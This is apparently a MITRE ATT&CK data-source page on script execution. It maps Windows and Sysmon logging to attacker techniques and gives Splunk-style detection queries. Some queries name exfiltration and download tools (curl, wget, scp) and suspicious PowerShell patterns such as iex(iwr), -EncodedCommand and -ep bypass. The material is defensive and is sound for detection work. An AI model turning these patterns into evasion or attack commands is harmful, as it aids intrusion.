1. Home
  2. Data Sources
  3. Script

Script

A file or stream containing a list of commands, allowing them to be launched in sequence[1][2][3]

ID: DS0012
Platforms: ESXi, Windows
Collection Layer: Host
Contributors: Center for Threat-Informed Defense (CTID)
Version: 1.2
Created: 20 October 2021
Last Modified: 18 April 2025
Version Permalink

Data Components

Script: Script Execution

The execution of a text file that contains code via the interpreter.

Data Collection Measures:

  • Windows Event Logs:
    • Event ID 4104 (PowerShell Script Block Logging) – Captures full command-line execution of PowerShell scripts.
    • Event ID 4688 (Process Creation) – Detects script execution by tracking process launches (powershell.exe, wscript.exe, cscript.exe).
    • Event ID 5861 (Script Execution) – Captures script execution via Windows Defender AMSI logging.
  • Sysmon (Windows):
    • Event ID 1 (Process Creation) – Monitors script execution initiated by scripting engines.
    • Event ID 11 (File Creation) – Detects new script files written to disk before execution.
  • Endpoint Detection and Response (EDR) Tools:
    • Track script execution behavior, detect obfuscated commands, and prevent malicious scripts.
  • PowerShell Logging:
    • Enable Module Logging: Logs all loaded modules and cmdlets.
    • Enable Script Block Logging: Captures complete PowerShell script execution history.
  • SIEM Detection Rules:
    • Detect script execution with obfuscated, encoded, or remote URLs.
    • Alert on script executions using -EncodedCommand or iex(iwr).

Script: Script Execution

The execution of a text file that contains code via the interpreter.

Data Collection Measures:

  • Windows Event Logs:
    • Event ID 4104 (PowerShell Script Block Logging) – Captures full command-line execution of PowerShell scripts.
    • Event ID 4688 (Process Creation) – Detects script execution by tracking process launches (powershell.exe, wscript.exe, cscript.exe).
    • Event ID 5861 (Script Execution) – Captures script execution via Windows Defender AMSI logging.
  • Sysmon (Windows):
    • Event ID 1 (Process Creation) – Monitors script execution initiated by scripting engines.
    • Event ID 11 (File Creation) – Detects new script files written to disk before execution.
  • Endpoint Detection and Response (EDR) Tools:
    • Track script execution behavior, detect obfuscated commands, and prevent malicious scripts.
  • PowerShell Logging:
    • Enable Module Logging: Logs all loaded modules and cmdlets.
    • Enable Script Block Logging: Captures complete PowerShell script execution history.
  • SIEM Detection Rules:
    • Detect script execution with obfuscated, encoded, or remote URLs.
    • Alert on script executions using -EncodedCommand or iex(iwr).
Domain ID Name Detects
Enterprise T1560 Archive Collected Data

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.002 Archive via Library

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.003 Archive via Custom Method

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1119 Automated Collection

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

ICS T0802 Automated Collection

Monitor for any suspicious attempts to enable script execution on a system. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible, to determine their actions and intent.
Enterprise T1020 Automated Exfiltration

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Detecting Automated Script Execution for Exfiltration

(EventCode=1 OR source="/var/log/audit/audit.log" type="execve")| where (script_path IN (".ps1", ".sh", ".py", ".bat"))| where (command IN ("scp", "rsync", "ftp", "curl", "wget"))| eval risk_score=case( script_path LIKE "%.ps1", 9, script_path LIKE "%.sh", 8, script_path LIKE "%.bat", 7)| where risk_score >= 8| stats count by _time, host, user, script_path, command, risk_score

Enterprise T1651 Cloud Administration Command

Monitor the execution of scripts within virtual machines, especially those initiated via cloud management services like Azure RunCommand. In Azure, usage of Azure RunCommand can be identified via the Azure Activity Logs, and additional details on the result of executed jobs are available in the C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows directory on Windows virtual machines.[4]

Analytic 1 - Unauthorized script execution

sourcetype=azure:activity| search script_name IN ("script.sh", "run.ps1", "start.cmd")| where script_name IN ("script.sh", "run.ps1", "start.cmd") AND user NOT IN ("known_admins")
Enterprise T1059 Command and Scripting Interpreter

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Look for attempts to enable scripts on the system.

index=windows (EventCode=1 OR EventCode=4688 OR EventCode=4103 OR EventCode=4104) (CommandLine="script")| search script_name IN (".ps1", ".sh", ".py", ".rb", ".js", ".vbs")| eval suspicious_script=if(like(script_name, "%.sh") AND hour(_time) NOT BETWEEN 8 AND 18, "Yes", "No")| where suspicious_script="Yes"
.001 PowerShell

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Script Block Logging Events

(source=WinEventLog:"Microsoft-Windows-PowerShell/Operational" EventID="4104" AND Image="powershell.exe" AND (CommandLine="-enc" OR CommandLine="-ep bypass" OR CommandLine="-noni*")
.005 Visual Basic

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Note: Be aware of VBScript execution from temporary or unusual file locations, which may indicate malicious activity.

Analytic 1 - Script Execution from Temporary Locations

(source=WinEventLog:"Microsoft-Windows-PowerShell/Operational" EventID="4103") | WHERE CommandLine LIKE "AppData.vbs" OR CommandLine LIKE "AppData.vbe" OR CommandLine LIKE "AppData.vba"

.007 JavaScript

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.011 Lua

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Enterprise T1005 Data from Local System

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
ICS T0893 Data from Local System

Monitor for any suspicious attempts to enable scripts running on a system. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Enterprise T1140 Deobfuscate/Decode Files or Information

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1482 Domain Trust Discovery

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1615 Group Policy Discovery

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1564 Hide Artifacts

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
.003 Hidden Window

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
.007 VBA Stomping

Detection efforts should be placed finding differences between VBA source code and p-code.[5] VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.[6][7]
Enterprise T1562 Impair Defenses

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
.002 Disable Windows Event Logging

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Enterprise T1056 .002 Input Capture: GUI Input Capture

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1674 Input Injection

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Scripts injected via clipboard or keystroke simulation

(index=main sourcetype="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104)OR (index=main sourcetype=sysmon EventCode=1 CommandLine="osascript" OR CommandLine="python" OR CommandLine="bash")| transaction user maxspan=15s| join user [ search index=wineventlog sourcetype="WinEventLog:System" (EventCode=400 OR EventCode=20001) | search DeviceName="HID" OR DeviceName="Keyboard" | stats count by user, _time, DeviceName ]| table _time, user, CommandLine, DeviceName

Enterprise T1559 Inter-Process Communication

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.001 Component Object Model

Monitor for any attempts to enable scripts running on a system would be considered suspicious. Enumeration of COM objects, via Query Registry or PowerShell, may also proceed malicious use.[8][9]
.002 Dynamic Data Exchange

Monitor for any attempts to enable scripts running on a system would be considered suspicious. OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/
Enterprise T1556 .005 Modify Authentication Process: Reversible Encryption

Consider monitoring and/or blocking suspicious execution of Active Directory PowerShell modules, such as Set-ADUser and Set-ADAccountControl, that change account configurations.
ICS T0840 Network Connection Enumeration

Monitor for any suspicious attempts to enable script execution on a system. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Enterprise T1027 Obfuscated Files or Information

Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., ^).

Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters.
.010 Command Obfuscation

Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., ^).

Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters.
Enterprise T1620 Reflective Code Loading

Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.[10][11]
ICS T0853 Scripting

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
ICS T0894 System Binary Proxy Execution

Monitor for any suspicious attempts to enable script execution on a system. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Enterprise T1016 System Network Configuration Discovery

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1216 System Script Proxy Execution

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.001 PubPrn

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.002 SyncAppvPublishingServer

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

References

  1. Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.
  2. Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.
  3. Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.
  4. Adrien Bataille, Anders Vejlby, Jared Scott Wilson, and Nader Zaveri. (2021, December 14). Azure Run Command for Dummies. Retrieved March 13, 2023.
  5. Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping — Advanced Maldoc Techniques. Retrieved September 17, 2020.
  6. Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.
  1. decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.
  2. Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.
  3. Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.
  4. MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.
  5. The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.